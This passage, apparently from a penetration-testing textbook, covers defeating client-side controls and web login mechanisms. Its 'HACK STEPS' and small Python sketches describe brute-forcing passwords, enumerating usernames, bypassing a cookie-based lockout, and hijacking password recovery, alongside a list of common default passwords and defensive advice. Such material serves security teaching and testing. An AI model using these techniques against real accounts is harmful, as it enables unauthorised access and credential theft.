DRM technologies to prevent users from copying digital media files.

Many companies have invested very heavily in these client-side con-

trols, and each new solution is usually broken within a short interval.)

The only secure way to validate client-generated data is on the server side of

the application. Every item of data received from the client should be regarded

as tainted and potentially malicious.

COMMON MYTH It is sometimes perceived that any use of client-

side controls must be automatically bad. In particular, some professional

penetration testers report the presence of client-side controls as a “finding”

without verifying whether they are replicated on the server or whether there is

any nonsecurity explanation for their existence. In fact, despite the significant

caveats arising from the various attacks described in this chapter, there are

nevertheless ways of using client-side controls that do not give rise to

any security vulnerabilities:

■■

Client-side scripts can be used to validate input as a means of

enhancing usability, avoiding the need for round-trip communication

with the server. For example, if the user enters their date of birth in an

incorrect format, alerting them to the problem via a client-side script

provides a much more seamless experience. Of course, the application

must revalidate the item submitted when it arrives at the server.

■■

There are occasional cases where client-side data validation can be

effective as a security measure — for example, as a defense against

DOM-based cross-site scripting attacks. However, these are cases

where the direct focus of the attack is another application user, rather

than the server-side application, and exploiting a potential

vulnerability does not necessarily depend upon transmitting any

malicious data to the server. See Chapter 12 for further details of this

kind of scenario.

■■

As described previously, there are ways of transmitting encrypted data

via the client that are not vulnerable to tampering or replay attacks.

Logging and Alerting

When mechanisms such as length limits and JavaScript-based validation are

employed by an application to enhance performance and usability, these

should be integrated with server-side intrusion detection defenses. The server-

side logic which performs validation of client-submitted data should be aware

of the validation that has already occurred on the client side. If data that would

have been blocked by client-side validation is received, the application may

infer that a user is actively circumventing this validation, and so is likely to be

malicious. Anomalies should be logged and, if appropriate, application

administrators should be alerted in real time so that they can monitor any

attempted attack and take suitable action as required. The application may

also actively defend itself by terminating the user’s session or even suspend-

ing his account.

NOTE In some cases where JavaScript is employed, the application is still

usable by users who have disabled JavaScript within their browser. In this

situation, JavaScript-based form validation code is simply skipped by the

browser, and the raw input entered by the user is submitted. To avoid false

positives, the logging and alerting mechanism should be aware of where and

how this can arise.
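
A minimal sketch of this idea follows, under stated assumptions: the field is a date of birth, the client enforces an HTML maxlength of 10 and a JavaScript format check, and the function and logger names are invented for illustration. The sketch treats a breach of the HTML length limit as suspicious, but treats a format failure alone as possibly innocent, because the user may simply have JavaScript disabled.

```python
import logging
import re
from typing import Tuple

logger = logging.getLogger("client_control_bypass")

# Hypothetical rules mirrored from the client: an HTML maxlength attribute
# and a JavaScript format check on the same field.
MAX_LENGTH = 10
JS_PATTERN = re.compile(r"\d{4}-\d{2}-\d{2}")


def check_date_field(value: str, session_id: str) -> Tuple[bool, bool]:
    """Return (is_valid, is_suspicious) for a submitted date of birth."""
    too_long = len(value) > MAX_LENGTH
    bad_format = JS_PATTERN.fullmatch(value) is None
    is_valid = not (too_long or bad_format)
    # maxlength is enforced by the browser itself, so exceeding it implies
    # the request was modified. A format failure alone may only mean that
    # JavaScript was disabled, so it is rejected but not flagged.
    is_suspicious = too_long
    if is_suspicious:
        logger.warning("client-side length limit bypassed, session=%s", session_id)
    return is_valid, is_suspicious
```

Either way the input is rejected on the server. The second return value only decides whether the event is logged as a probable attack.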

Chapter Summary

Virtually all client-server applications must accept the fact that the client com-

ponent, and all processing that occurs on it, cannot be trusted to behave as

expected. As you have seen, the transparent communications methods gener-

ally employed by web applications mean that an attacker equipped with sim-

ple tools and minimal skill can trivially circumvent most controls

implemented on the client. Even where an application makes attempts to

obfuscate data and processing residing on the client side, a determined

attacker will be able to compromise these defenses.

In every instance where you identify data being transmitted via the client, or

validation of user-supplied input being implemented on the client, you should

test how the server responds to unexpected data that bypasses those controls.

Very often, serious vulnerabilities are to be found lurking behind an applica-

tion’s assumptions about the protection afforded to it by defenses that are

implemented at the client.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. How can data be transmitted via the client in a way that prevents tam-

pering attacks?

2. An application developer wishes to stop an attacker from performing

brute-force attacks against the login function. Because the attacker may

target multiple usernames, the developer decides to store the number of

failed attempts in an encrypted cookie, blocking any request if the num-

ber of failed attempts exceeds five.

How can this defense be bypassed?

3. An application contains an administrative page that is subject to rigor-

ous access controls. The page contains links to diagnostic functions

located on a different web server. Access to these functions should also

be restricted to administrators only. Without implementing a second

authentication mechanism, which of the following client-side mecha-

nisms (if any) could be used to safely control access to the diagnostic

functionality? Is there any further information you would need to help

choose a solution?

(a) The diagnostic functions could check the HTTP Referer header, to

confirm that the request originated on the main administrative page.

(b) The diagnostic functions could validate the supplied cookies, to con-

firm that these contain a valid session token for the main applica-

tion.

(c) The main application could set an authentication token in a hidden

field that is included within the request. The diagnostic function

could validate this to confirm that the user has a session on the main

application.

4. If a form field includes the attribute disabled=true, it will not be

submitted with the rest of the form. How can you change this behavior?

5. Are there any means by which an application can ensure that a piece of

input validation logic has been run on the client?

CHAPTER 6

Attacking Authentication

On the face of it, authentication is conceptually among the simplest of all the
security mechanisms employed within web applications. In the typical case, a
user supplies her username and password, and the application must verify
that these items are correct. If so, it lets the user in. If not, it does not.

Authentication also lies at the heart of an application’s protection against
malicious attack. It is the front line of defense against unauthorized access, and
if an attacker can defeat those defenses, they will often gain full control of the
application’s functionality, and unrestricted access to the data held within it.
Without robust authentication to rely upon, none of the other core security
mechanisms (such as session management and access control) can be effective.

In fact, despite its apparent simplicity, devising a secure authentication
function is an extremely subtle business, and in real-world web applications
authentication is very often the weakest link, which enables an attacker to gain
unauthorized access. The authors have lost count of the number of applications
that we have fundamentally compromised as a result of various defects
in authentication logic.

This chapter will look in detail at the wide variety of design and implementation
flaws that commonly afflict web applications. These typically arise
because the application designers and developers fail to ask a simple question:
What could an attacker achieve if he were to target our authentication mechanism?
In the majority of cases, as soon as this question is asked in earnest of a
particular application, a number of potential vulnerabilities materialize, any
one of which may be sufficient to break the application.

Many of the most common authentication vulnerabilities are literally no-

brainers. Anyone can type dictionary words into a login form in an attempt to

guess valid passwords. In other cases, subtle defects may lurk deep within the

application’s processing, which can only be uncovered and exploited after

painstaking analysis of a complex multistage login mechanism. We will

describe the full spectrum of these attacks, including techniques which have

succeeded in breaking the authentication of some of the most security-critical

and robustly defended web applications on the planet.

Authentication Technologies

There is a wide range of different technologies available to web application

developers when implementing authentication mechanisms:

■■

HTML forms-based authentication.

■■

Multi-factor mechanisms, such as those combining passwords and

physical tokens.

■■

Client SSL certificates and/or smartcards.

■■

HTTP basic and digest authentication.

■■

Windows-integrated authentication using NTLM or Kerberos.

■■

Authentication services.

By far the most common authentication mechanism employed by web

applications uses HTML forms to capture a username and password and sub-

mit these to the application. This mechanism accounts for well over 90% of

applications you are likely to encounter on the Internet.

In more security-critical Internet applications, such as online banking, this

basic mechanism is often expanded into multiple stages, requiring the user to

submit additional credentials, such as PIN numbers or selected characters from

a secret word. HTML forms are still typically used to capture relevant data.

In the most security-critical applications, such as private banking for high-

worth individuals, it is common to encounter multi-factor mechanisms using

physical tokens. These tokens typically produce a stream of one-time pass-

codes, or perform a challenge-response function based on input specified by

the application. As the cost of this technology falls over time, it is likely that

more applications will employ this kind of mechanism. However, many of

these solutions do not actually address the threats for which they were

devised — primarily phishing attacks and those employing client-side Trojans.

Some web applications employ client-side SSL certificates or cryptographic

mechanisms implemented within smartcards. Because of the overhead of

administering and distributing these items, they are typically used only in

security-critical contexts where an application’s user base is small.

The HTTP-based authentication mechanisms (basic, digest, and Windows-

integrated) are rarely used on the Internet, and are much more commonly

encountered in intranet environments where an organization’s internal users

gain access to corporate applications by supplying their normal network or

domain credentials, which are processed by the application via one of these

technologies.

Third-party authentication services such as Microsoft Passport are occasion-

ally encountered, but at the present time have not been adopted on any signif-

icant scale.

Most of the vulnerabilities and attacks that arise in relation to authentication

can be applied to any of the technologies mentioned. Because of its over-

whelming dominance, we will describe each specific vulnerability and attack

in the context of HTML forms-based authentication, and where relevant will

point towards any specific differences and attack methodologies that are rele-

vant to the other available technologies.

Design Flaws in Authentication Mechanisms

Authentication functionality is subject to more design weaknesses than any

other security mechanism commonly employed in web applications. Even in

the apparently simple, standard model where an application authenticates

users based on their username and password, shortcomings in the design of

this model can leave the application highly vulnerable to unauthorized access.

Bad Passwords

Many web applications employ no or minimal controls over the quality of

users’ passwords. It is common to encounter applications that allow pass-

words that are:

■■

Very short or blank

■■

Common dictionary words or names

■■

Set to the same as the username

■■

Still set to a default value

Figure 6-1 shows an example of weak password quality rules. End users

typically display little awareness of security issues. Hence, it is highly likely

that an application that does not enforce strong password standards will con-

tain a large number of user accounts with weak passwords set. These pass-

words can be easily guessed by an attacker, granting them unauthorized

access to the application.

Figure 6-1: An application that enforces weak password quality rules

HACK STEPS

Attempt to discover any rules regarding password quality:

■ Review the web site for any description of the rules.

■ If self-registration is possible, attempt to register several accounts with

different kinds of weak passwords to discover what rules are in place.

■ If you control a single account and password change is possible, attempt

to change your password to various weak values.

NOTE If password quality rules are enforced only through client-side controls,

this is not itself a security issue because ordinary users will still be protected. It

is not normally a threat to an application’s security that a crafty attacker can

assign themselves a weak password.
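
The four categories of weak password listed earlier in this section could be checked on the server roughly as follows. This is a sketch only: the word list is deliberately tiny, and MIN_LENGTH, COMMON_WORDS, and the function name are assumptions made for illustration rather than recommended values.

```python
# Hypothetical, deliberately tiny word list. A real check would use a
# much larger dictionary.
COMMON_WORDS = {"password", "letmein", "qwerty", "admin", "test"}
MIN_LENGTH = 8  # assumed threshold, not taken from the text


def weak_password_reasons(username: str, password: str, default: str = "") -> list:
    """Return the reasons (if any) why a proposed password is weak."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append("too short or blank")
    if password.lower() in COMMON_WORDS:
        reasons.append("common dictionary word")
    if password.lower() == username.lower():
        reasons.append("same as username")
    if default and password == default:
        reasons.append("still set to default value")
    return reasons
```

An empty list means that none of the four checks fired. It does not mean the password is strong.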

Brute-Forcible Login

Login functionality presents an open invitation for an attacker to try to guess

usernames and passwords, and so gain unauthorized access to the application.

If the application allows an attacker to make repeated login attempts with dif-

ferent passwords until the correct one is guessed, then it is highly vulnerable

even to an amateur attacker who manually enters some common usernames

and passwords into their browser. Values frequently encountered even in pro-

duction systems include:

■■

test

■■

testuser

■■

admin

■■

administrator

■■

demo

■■

demouser

■■

password

■■

password1

■■

password123

■■

qwerty

■■

test123

■■

letmein

■■

[organization’s name]

In this situation, any serious attacker will use automated techniques to

attempt to guess passwords, based on lengthy lists of common values. Given

today’s bandwidth and processing capabilities, it is possible to make thou-

sands of login attempts per minute from a standard PC and DSL connection.

Even the most robust passwords will eventually be broken in this scenario.

Various techniques and tools for using automation in this way are described

in detail in Chapter 13. Figure 6-2 demonstrates a successful password guess-

ing attack against a single account using Burp Intruder. The successful login

attempt can be clearly distinguished by the difference in the HTTP response

code, the response length, and the absence of the “login incorrect” message.

NOTE In some applications, client-side controls are employed in an attempt

to prevent password-guessing attacks. For example, an application may set a

cookie such as failedlogins=1, and increment this following each

unsuccessful attempt. When a certain threshold is reached, the server will

detect this in the submitted cookie and refuse to process the login attempt.

This kind of client-side defense may prevent a manual attack being launched

using only a browser, but it can of course be trivially bypassed as described in

Chapter 5.
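
The weakness of a client-held counter can be shown with a small simulation. Everything here is hypothetical: flawed_login stands in for the server-side handler, the threshold of three is arbitrary, and cookies are modeled as plain dictionaries rather than real HTTP headers.

```python
LOCKOUT_THRESHOLD = 3     # assumed value for illustration
REAL_PASSWORD = "s3cret"  # hypothetical account password


def flawed_login(password: str, cookies: dict) -> tuple:
    """Return (success, cookies_to_set), trusting the client-held counter."""
    failed = int(cookies.get("failedlogins", "0"))
    if failed >= LOCKOUT_THRESHOLD:
        return False, cookies  # refuses to process the attempt
    if password == REAL_PASSWORD:
        return True, {}
    return False, {"failedlogins": str(failed + 1)}


def attack(guesses):
    """Try each guess, always submitting no cookie at all."""
    for guess in guesses:
        success, _ignored_cookies = flawed_login(guess, cookies={})
        if success:
            return guess
    return None
```

A browser that faithfully returns the cookie is locked out after three failures. The attack function never returns it, so the counter the server sees is always zero.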

Figure 6-2: A successful password-guessing attack

HACK STEPS

■ Manually submit several bad login attempts for an account you control,

monitoring the error messages received.

■ After around 10 failed logins, if the application has not returned any

message about account lockout, attempt to log in correctly. If this

succeeds, there is probably no account lockout policy.

■ If you do not control any accounts, attempt to enumerate a valid username

(see the “Verbose Failure Messages” section) and make several bad logins

using this, monitoring for any error messages about account lockout.

■ To mount a brute-force attack, first identify a difference in the application’s

behavior in response to successful and failed logins, which can be used to

discriminate between these during the course of the automated attack.

■ Obtain a list of enumerated or common usernames and a list of common

passwords. Use any information obtained about password quality rules

to tailor the password list so as to avoid superfluous test cases.

■ Use a suitable tool or a custom script to quickly generate login requests

using all permutations of these usernames and passwords. Monitor the

server’s responses to identify login attempts that are successful. Chapter

13 describes in detail various techniques and tools for performing

customized attacks using automation.

■ If you are targeting several usernames at once, it is usually preferable to

perform this kind of brute-force attack in a breadth-first rather than a

depth-first manner. This involves iterating through a list of passwords

(starting with the most common) and attempting each password in turn

on every username. This approach has two benefits: first, you will dis-

cover accounts with common passwords more quickly, and second, you

are less likely to trigger any account lockout defenses, because there is a

time delay between successive attempts using each individual account.
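
The breadth-first ordering described in the last step can be sketched as a generator. The function name is an assumption, and the sketch only produces the order of attempts; sending the requests is left to whatever tool or script is in use.

```python
from typing import Iterable, Iterator, Tuple


def breadth_first(usernames: Iterable[str],
                  passwords: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (username, password) pairs, trying each password on all users."""
    users = list(usernames)
    for password in passwords:   # outer loop: most common password first
        for username in users:   # inner loop: every account in turn
            yield username, password
```

With this ordering, successive attempts against any one account are separated by one request for every other username in the list, which is the source of the time delay mentioned above.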

Verbose Failure Messages

A typical login form requires the user to enter two pieces of information (user-

name and password), and some applications require several more (for exam-

ple, date of birth, a memorable place, or a PIN number).

When a login attempt fails, you can of course infer that at least one piece of

information was incorrect. However, if the application informs you as to

which piece of information was invalid, you can exploit this behavior to con-

siderably diminish the effectiveness of the login mechanism.

In the simplest case, where a login requires a username and password, an

application might respond to a failed login attempt by indicating whether the

reason for the failure was an unrecognized username or the wrong password,

as illustrated in Figure 6-3.

Figure 6-3: Verbose login failure messages indicating when a valid username has been

guessed

In this instance, you can use an automated attack to iterate through a large

list of common usernames to enumerate which of these are valid. Of course,

usernames are not normally considered a secret (they are not masked during

login, for instance). However, giving an attacker an easy means to identify

valid usernames increases the likelihood that they will compromise the

application with a given level of time, skill, and effort. A list of enumerated

usernames can be used as the basis for various subsequent attacks, including

password guessing, attacks on user data or sessions, or social engineering.

NOTE Many authentication mechanisms disclose usernames either implicitly

or explicitly. In a web mail account, the username is often the email address,

which is common knowledge by design. Many other sites expose usernames

within the application without considering the advantage this grants to an

attacker, or allow usernames to be easily guessed (for example, user1842).

In more complex login mechanisms, where an application requires the user

to submit several pieces of information, or proceed through several stages,

verbose failure messages or other discriminators can enable an attacker to tar-

get each stage of the login process in turn, increasing the likelihood that they

will gain unauthorized access.

NOTE This vulnerability may arise in more subtle ways than illustrated

here. Even if the error messages returned in response to a valid and invalid

username are superficially similar, there may be small differences between

them that can be used to enumerate valid usernames. For example, if multiple

code paths within the application return the “same” failure message, there may

be minor typographical differences between each instance of the message. In

some cases, the application’s responses may be identical on-screen but contain

subtle differences hidden within the HTML source, such as comments or layout

differences. If no obvious means of enumerating usernames presents itself, you

should perform a very close comparison of the application’s responses to valid

and invalid usernames.
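
One way to carry out such a close comparison is to diff the two response bodies line by line. The sketch below uses Python's standard difflib module. The function name and the sample responses in the usage note are invented for illustration.

```python
import difflib


def response_differences(valid_body: str, invalid_body: str) -> list:
    """Return only the lines that differ between two failure responses."""
    diff = difflib.ndiff(valid_body.splitlines(), invalid_body.splitlines())
    # ndiff prefixes removed lines with "- " and added lines with "+ ".
    # Unchanged lines ("  ") and hint lines ("? ") are dropped.
    return [line for line in diff if line.startswith(("- ", "+ "))]
```

For example, if the response for a valid username contains the line `<p>Login incorrect.</p>` and the response for an invalid one contains `<p>Login incorrect</p>`, the function reports both lines, exposing the missing full stop that would be easy to overlook on-screen.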

HACK STEPS

■ If you already know one valid username (for example, an account you

control), submit one login using this username and an incorrect pass-

word, and another login using a completely random username.

■ Record every detail of the server’s responses to each login attempt,

including the status code, any redirects, information displayed on screen,

and any differences hidden away in the HTML page source. Use your

intercepting proxy to maintain a full history of all traffic to and from the

server.

■ Attempt to discover any obvious or subtle differences in the server’s

responses to the two login attempts.

■ If this fails, repeat the exercise everywhere within the application where

a username can be submitted (for example, self-registration, password

change, and forgotten password).

■ If a difference is detected in the server’s responses to valid and invalid

usernames, obtain a list of common usernames and use a custom script

or automated tool to quickly submit each username and filter the

responses that signify that the username is valid (see Chapter 13).

■ Before commencing your enumeration exercise, verify whether the application

performs any account lockout after a certain number of failed login attempts.

If so, it is desirable to design your enumeration attack with this fact in mind.

For example, if the application will grant you only three failed login attempts with

any given account, you run the risk of “wasting” one of these for every

username that you discover through automated enumeration. Therefore,

when performing your enumeration attack, do not submit a completely

far-fetched password with each login attempt, but rather submit either

(a) a single common password such as “password1” or (b) the username

itself as the password. If password quality rules are weak, it is highly

likely that some of the attempted logins that you perform as part of your

enumeration exercise will actually be successful and disclose both the

username and password in one single hit. To implement option (b) and

set the password field to the same as the username, you can use the

“battering ram” attack mode in Burp Intruder to insert the same payload

at multiple positions in your login request.
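
For readers scripting this step rather than using Burp Intruder, options (a) and (b) might be generated as follows. The parameter names username and password are assumptions about the target login form, and the function name is hypothetical.

```python
from urllib.parse import urlencode


def enumeration_payloads(usernames, fixed_password=None):
    """Yield form-encoded login bodies for an enumeration run."""
    for name in usernames:
        # Option (b): reuse the username as the password, unless a single
        # common password such as "password1" was requested (option (a)).
        password = fixed_password if fixed_password is not None else name
        # "username" and "password" are assumed parameter names.
        yield urlencode({"username": name, "password": password})
```

Calling the function with no fixed password reproduces the effect of inserting the same payload at both positions in the request.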

Even if an application’s responses to login attempts containing valid and

invalid usernames are identical in every intrinsic respect, it may yet be possi-

ble to enumerate usernames based on the time taken for the application to

respond to the login request. Applications often perform very different back-

end processing on a login request, depending on whether it contains a valid

username. For example, when a valid username is submitted, the application

may retrieve user details from a back-end database, perform various process-

ing on these details (for example, checking whether the account is expired),

and then validate the password (which may involve a resource-intensive hash

algorithm), before returning a generic message if the password is incorrect.

The timing difference between the two responses may be too subtle to detect

when working with only a browser, but an automated tool may be able to dis-

criminate between them. Even if the results of such an exercise contain a large

ratio of false positives, it is still better to have a list of 100 usernames approxi-

mately 50% of which are valid than a list of 10,000 usernames approximately

0.5% of which are valid. See Chapter 14 for a detailed methodology for how to

detect and exploit this type of timing difference to extract information from the

application.
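
As a rough illustration of how an automated tool might discriminate on timing, the sketch below compares the median response time for each username against a baseline. It assumes that the timings have already been collected, that valid usernames take longer to process (as in the example above), and that the baseline username is invalid. The factor of 1.5 is an arbitrary threshold, not a recommended value.

```python
import statistics


def likely_valid(timings: dict, baseline_user: str, factor: float = 1.5) -> list:
    """Return usernames whose median response time exceeds the baseline.

    timings maps each username to a list of response times in seconds.
    baseline_user is a name known (or assumed) to be invalid.
    factor is an arbitrary threshold chosen for illustration.
    """
    baseline = statistics.median(timings[baseline_user])
    return sorted(
        name for name, samples in timings.items()
        if name != baseline_user and statistics.median(samples) > factor * baseline
    )
```

Using the median of several samples rather than a single measurement reduces the effect of occasional network delays, although false positives remain likely.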

TIP In addition to the login functionality itself, there may be other sources of

information where you can obtain valid usernames. Review all of the source code

comments discovered during application mapping (see Chapter 4) to identify any

apparent usernames. Any email addresses of developers or other personnel

within the organization may be valid usernames, either in full or just the user-

specific prefix. Any accessible logging functionality may disclose usernames.

Vulnerable Transmission of Credentials

If an application uses an unencrypted HTTP connection to transmit login cre-

dentials, an eavesdropper who is suitably positioned on the network will of

course be able to intercept them. Depending on the user’s location, potential

eavesdroppers may reside:

■■

On the user’s local network

■■

Within the user’s IT department

■■

Within the user’s ISP

■■

On the Internet backbone

■■

Within the ISP hosting the application

■■

Within the IT department managing the application

NOTE Any of these locations may be occupied by authorized personnel but

also potentially by an external attacker who has compromised the relevant

infrastructure through some other means. Even if the intermediaries on a

particular network are believed to be trusted, it is safer to use secure transport

mechanisms when passing sensitive data over it.

Even if login occurs over HTTPS, credentials may still be disclosed to unau-

thorized parties if the application handles them in an unsafe manner:

■■

If credentials are transmitted as query string parameters, as opposed to

in the body of a POST request, then these are liable to be logged in

various places, for example within the user’s browser history, within the

web server logs, and within the logs of any reverse proxies employed

within the hosting infrastructure. If an attacker succeeds in compromis-

ing any of these resources, then he may be able to escalate privileges by

capturing the user credentials stored there.

■■

Although most web applications do use the body of a POST request to

submit the HTML login form itself, it is surprisingly common to see the

login request handled via a redirect to a different URL, with the same

credentials passed as query string parameters. Why application

developers consider it necessary to perform these bounces is not clear,

but having elected to do so, it is easier to implement them as 302

redirects to a URL than as POST requests using a second HTML form

submitted via JavaScript.

■■

Web applications sometimes store user credentials in cookies, usually to

implement poorly designed mechanisms for login, password change,

“remember me,” and so on. These credentials are vulnerable to capture

via attacks that compromise user cookies, and in the case of persistent

cookies, by anyone who gains access to the client’s local file system.

Even if the credentials are encrypted, an attacker can still simply replay

the cookie and so log in as a user without actually knowing her creden-

tials. Chapter 12 describes various ways in which an attacker can target

other users to capture their cookies.

Many applications use HTTP for unauthenticated areas of the application

and switch to HTTPS at the point of login. If this is the case, then the correct

place to switch to HTTPS is when the login page is loaded in the browser,

enabling a user to verify that the page is authentic before entering credentials.

However, it is common to encounter applications that load the login page itself

using HTTP, and switch to HTTPS at the point where credentials are submit-

ted. This is unsafe, because a user cannot verify the authenticity of the login

page itself and so has no assurance that the credentials will be submitted

securely. A suitably positioned attacker can intercept and modify the login

page, changing the target URL of the login form to use HTTP. By the time an

astute user realizes that the credentials have been submitted using HTTP, they

will have been compromised.

HACK STEPS

■■

Carry out a successful login while monitoring all traffic in both directions

between the client and server.

■■

Identify every case in which the credentials are transmitted in either

direction. You can set interception rules in your intercepting proxy to flag

messages containing specific strings (see Chapter 19).

■■

If any instances are found in which credentials are submitted in a URL

query string, or as a cookie, or are transmitted back from the server to

the client, understand what is happening and try to ascertain what pur-

pose the application developers were attempting to achieve. Try to find

every means by which an attacker might interfere with the application’s

logic to compromise other users’ credentials.

■■

If any sensitive information is transmitted over an unencrypted channel,

this is, of course, vulnerable to interception.

■■

If no cases of actual credentials being transmitted insecurely are identi-

fied, pay close attention to any data that appears to be encoded or

obfuscated. If this includes sensitive data, it may be possible to reverse

engineer the obfuscation algorithm.

■■

If credentials are submitted using HTTPS but the login form is loaded

using HTTP, then the application is vulnerable to a man-in-the-middle

attack, which may be used to capture credentials.
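
Part of this review can be automated by scanning the request URLs recorded in a proxy history. The sketch below is one possible approach. The set of parameter names is a guess that would need tailoring to the target application, and the function name and the example host in the usage note are hypothetical.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed parameter names. Adjust to whatever the target application uses.
CREDENTIAL_PARAMS = {"password", "passwd", "pwd", "pin"}


def credential_findings(urls):
    """Return (url, issue) pairs for logged request URLs worth a closer look."""
    findings = []
    for url in urls:
        parts = urlsplit(url)
        params = {name.lower() for name in parse_qs(parts.query)}
        if params & CREDENTIAL_PARAMS:
            findings.append((url, "credentials in query string"))
            if parts.scheme == "http":
                findings.append((url, "credentials sent over unencrypted HTTP"))
    return findings
```

Given a URL such as `http://app.example/auth?pwd=1234`, the function reports both issues. It inspects URLs only, so credentials in cookies or response bodies still need to be checked by other means.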

Password Change Functionality

Surprisingly, many web applications do not provide any way for users to

change their password. However, this functionality is necessary for a well-

designed authentication mechanism for two reasons:

■■

Periodic enforced password change mitigates the threat of password

compromise by reducing the window in which a given password can be

targeted in a guessing attack and by reducing the window in which a

compromised password can be used by the attacker without detection.

■■

Users who suspect that their passwords may have been compromised

need to be able to quickly change their password to reduce the threat of

unauthorized use.

Although it is a necessary part of an effective authentication mechanism,

password change functionality is often vulnerable by design. It is frequently

the case that vulnerabilities that are deliberately avoided in the main login

function reappear in the password change function. There are many web

applications whose password change functions are accessible without authen-

tication and that:

■■

Provide a verbose error message indicating whether the requested user-

name is valid.

■■

Allow unrestricted guesses of the “existing password” field.

■■

Only check whether the “new password” and “confirm new password”

fields have the same value after validating the existing password,

thereby allowing an attack to succeed in discovering the existing pass-

word noninvasively.

HACK STEPS

■ Identify any password change functionality within the application. If this

is not explicitly linked from published content, it may still be imple-

mented. Chapter 4 describes various techniques for discovering hidden

content within an application.

■ Make various requests to the password change function, using invalid

usernames, invalid existing passwords, and mismatched “new password”

and “confirm new password” values.

■ Try to identify any behavior that can be used for username enumeration

or brute-force attacks (as described in the “Brute-Forcible Login” and

“Verbose Failure Messages” sections).
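The probing described in these steps is easier to interpret if each response is recorded against the probe that produced it. The following is a minimal sketch in Python, assuming you have already captured the response text for each probe (for example, from your intercepting proxy). The probe labels and the function names group_by_response and distinguishes are hypothetical and chosen only for illustration.

```python
from collections import defaultdict


def group_by_response(observations):
    """Group probe labels by the (whitespace-trimmed) response each produced."""
    groups = defaultdict(list)
    for label, response in observations.items():
        groups[response.strip()].append(label)
    return dict(groups)


def distinguishes(observations, first, second):
    """Return True if the two named probes produced different responses."""
    return observations[first].strip() != observations[second].strip()


# Hypothetical responses captured from a password change function.
observations = {
    "invalid_username": "Unknown user.",
    "invalid_existing_password": "Current password incorrect.",
    "mismatched_new_passwords": "Current password incorrect.",
}
```

If distinguishes(observations, "invalid_username", "invalid_existing_password") is true, the function is likely to be usable for username enumeration. If a wrong existing password and a mismatched pair of new passwords yield the same response, the existing password is probably being checked first.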


TIP If the password change form is only accessible by authenticated users

and does not contain a username field, it may still be possible to supply an

arbitrary username. The form may store the username in a hidden field, which

can easily be modified. If not, try supplying an additional parameter containing

the username, using the same parameter name as is used in the main login

form. This trick sometimes succeeds in overriding the username of the current

user, enabling you to brute force the credentials of other users even when this

is not possible at the main login.

Forgotten Password Functionality

Like password change functionality, mechanisms for recovering from a forgot-

ten password situation often introduce problems that may have been avoided

in the main login function, such as username enumeration.

In addition to this range of defects, design weaknesses in forgotten pass-

word functions frequently make this the weakest link at which to attack the

application’s overall authentication logic. Several kinds of design weaknesses

can often be found:

■■

The forgotten password functionality often involves presenting the user

with a secondary challenge in place of the main login, as shown in Fig-

ure 6-4. This challenge is often much easier for an attacker to respond to

than attempting to guess the user’s password. Questions about moth-

ers’ maiden names, memorable dates, favorite colors, and the like will

generally have a much smaller set of potential answers than the set of

possible passwords. Further, they often concern information that is

publicly known or that a determined attacker can discover with a

modest degree of effort.

Figure 6-4: A secondary challenge used in an account

recovery function


In many cases, the application allows users to set their own password

recovery challenge and response during registration, and users are

inclined to set extremely insecure challenges, presumably on the false

assumption that only they will ever be presented with them, for example:

“Do I own a boat?” In this situation, an attacker wishing to gain access

can use an automated attack to iterate through a list of enumerated or

common usernames, log all of the password recovery challenges, and

select those that appear most easily guessable. (See Chapter 13 for tech-

niques regarding how to grab this kind of data in a scripted attack.)

■■

As with password change functionality, application developers commonly

overlook the possibility of brute forcing the response to a password

recovery challenge, even when they block this attack on the main login

page. If an application allows unrestricted attempts to answer password

recovery challenges, then it is highly likely to be compromised by a

determined attacker.

■■

In some applications, the recovery challenge is replaced with a simple

password “hint” that is configurable by users during registration. Users

commonly set extremely obvious hints, even one that is identical to the

password itself, on the false assumption that only they will ever see them.

Again, an attacker with a list of common or enumerated usernames can

easily capture a large number of password hints and then start guessing.

■■

The mechanism by which an application enables users to regain control

of their account after correctly responding to a challenge is often vul-

nerable. One reasonably secure means of implementing this is to send a

unique, unguessable, time-limited recovery URL to the email address

that the user provided during registration. Visiting this URL within a

few minutes enables the user to set a new password. However, other

mechanisms for account recovery are often encountered that are inse-

cure by design:

■■

Some applications disclose the existing, forgotten password to the

user after successful completion of a challenge, enabling an attacker

to use the account indefinitely without any risk of detection by the

owner. Even if the account owner subsequently changes the blown

password, the attacker can simply repeat the same challenge to

obtain the new password.

■■

Some applications immediately drop the user into an authenticated

session after successful completion of a challenge, again enabling an

attacker to use the account indefinitely without detection, and with-

out ever needing to know the user’s password.

■■

Some applications employ the mechanism of sending a unique

recovery URL but send this to an email address specified by the user


at the time the challenge is completed. This provides absolutely no

enhanced security of the recovery process beyond possibly logging

the email address used by an attacker.

TIP Even if the application does not provide an on-screen field for you to

provide an email address to receive the recovery URL, the application may

transmit the address via a hidden form field or cookie. This presents a double

opportunity: you can discover the email address of the user you have

compromised, and you can modify its value to receive the recovery URL at an

address of your choosing.

■■

Some applications allow users to reset their password’s value directly

after successful completion of a challenge and do not send any email

notification to the user. This means that the compromising of an

account by an attacker will not be noticed until the owner happens to

attempt to log in again, and may even remain unnoticed if the owner

assumes that they must have forgotten their own password and so

resets it in the same way. An attacker who simply desires some access

to the application can then compromise a different user’s account for

a period and so continue using the application indefinitely.
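The reasonably secure design mentioned above (a unique, unguessable, time-limited recovery URL sent to the registered email address) can be sketched as follows. This is an illustration under stated assumptions, not a reference implementation: the class name RecoveryTokenStore, the 15-minute lifetime, and the in-memory dictionary are all hypothetical, and a real application would persist tokens and deliver the URL only to the address held on file.

```python
import hashlib
import secrets
import time

TOKEN_LIFETIME_SECONDS = 15 * 60  # assumed lifetime; the text says "a few minutes"


class RecoveryTokenStore:
    """Issues single-use, time-limited recovery tokens (in-memory sketch)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}  # SHA-256 digest of token -> (username, expiry time)

    def issue(self, username):
        # token_urlsafe draws from the operating system's CSPRNG, so the
        # value cannot be predicted from previously issued tokens.
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[digest] = (username, self._clock() + TOKEN_LIFETIME_SECONDS)
        return token  # embed in the URL emailed to the registered address

    def redeem(self, token):
        """Return the username if the token is valid, otherwise None."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(digest, None)  # pop makes the token single-use
        if entry is None:
            return None
        username, expiry = entry
        if self._clock() > expiry:
            return None
        return username
```

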